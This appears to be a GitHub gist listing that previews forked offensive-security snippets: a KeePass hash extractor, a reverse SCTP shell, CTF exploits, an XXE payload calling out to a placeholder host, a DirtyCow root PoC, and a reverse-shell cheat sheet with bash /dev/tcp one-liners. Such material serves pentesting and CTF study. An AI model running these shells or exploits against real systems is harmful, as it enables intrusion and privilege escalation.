waywardsun
waywardsun
/ keepass2john.py
Created Dec 21, 2017
— forked from HarmJ0y/keepass2john.py
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
View keepass2john.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/) | |
| # ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012 | |
| # ./keepass2john.c was released under the GNU General Public License | |
| # source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c | |
| # | |
| # Python port by @harmj0y, GNU General Public License | |
| # |
waywardsun
/ 1.md
Created Nov 9, 2017
— forked from sailik1991/0.0 CaptureTheFlag-CheetSheet.md
Quick reference for CTF
waywardsun
/ reverse_sctp_shell.c
Created Aug 11, 2017
— forked from 0xabe-io/reverse_sctp_shell.c
Simple C code to create a reverse shell over SCTP
View reverse_sctp_shell.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // server: ncat -v --sctp -l PORT_NUM | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <netinet/in.h> | |
| #include <netinet/sctp.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <arpa/inet.h> | |
| #include <string.h> |
waywardsun
/ pwn.py
Created Jun 19, 2017
— forked from saelo/pwn.py
Solution for "assignment" of GoogleCTF 2017
View pwn.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Exploit for "assignment" of GoogleCTF 2017 | |
| # | |
| # CTF-quality exploit... | |
| # | |
| # Slightly simplified and shortened explanation: | |
| # | |
| # The bug is a UAF of one or both values during add_assign() if a GC is | |
| # triggered during allocate_value(). The exploit first abuses this two leak a |
View XXE_payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
waywardsun
/ toilet-exploit.py
Created Jun 1, 2017
— forked from m1ghtym0/toilet-exploit.py
POC exploit for toilet service of FAUST-CTF-2017
View toilet-exploit.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| from re import findall | |
| from random import choice, randint | |
| from string import digits, ascii_uppercase | |
| from hashlib import sha256 | |
| from sys import argv, exit | |
| MAX_NAME_LEN = 64 |
waywardsun
/ offsec.md
Created May 17, 2017
— forked from trietptm/offsec.md
Penetrating Testing/Assessment Workflow
View offsec.md
Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*
- Reconnaissance
- Passive/Semi-Passive
- Tools
- Passive/Semi-Passive
- Discover - https://github.com/leebaird/discover
waywardsun
/ gist:84496cb1e4eeab23e421a6a0af60a3fa
Created Dec 19, 2016
— forked from galvanic/gist:861138ed2bdf61be3ce7
pyladies scapy
View gist:84496cb1e4eeab23e421a6a0af60a3fa
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| my slides: | |
| https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb | |
| official docs: | |
| http://www.secdev.org/projects/scapy/demo.html | |
| http://www.secdev.org/projects/scapy/doc/usage.html#sniffing | |
| some tutorials from the internet: | |
| https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf | |
| https://samsclass.info/124/proj11/proj17-scapy.html |
waywardsun
/ cowroot.c
Created Oct 21, 2016
— forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
View cowroot.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * (un)comment correct payload first (x86 or x64)! | |
| * | |
| * $ gcc cowroot.c -o cowroot -pthread | |
| * $ ./cowroot | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * Size of binary: 57048 | |
| * Racing, this may take a while.. | |
| * /usr/bin/passwd overwritten |
waywardsun
/ reverse_shells
Created Sep 20, 2016
— forked from sckalath/reverse_shells
Reverse shells
View reverse_shells
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #bash | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| #bash alt | |
| exec /bin/bash 0&0 2>&0 | |
| #bash alt 2 | |
| 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
| #bash alt 3 |
NewerOlder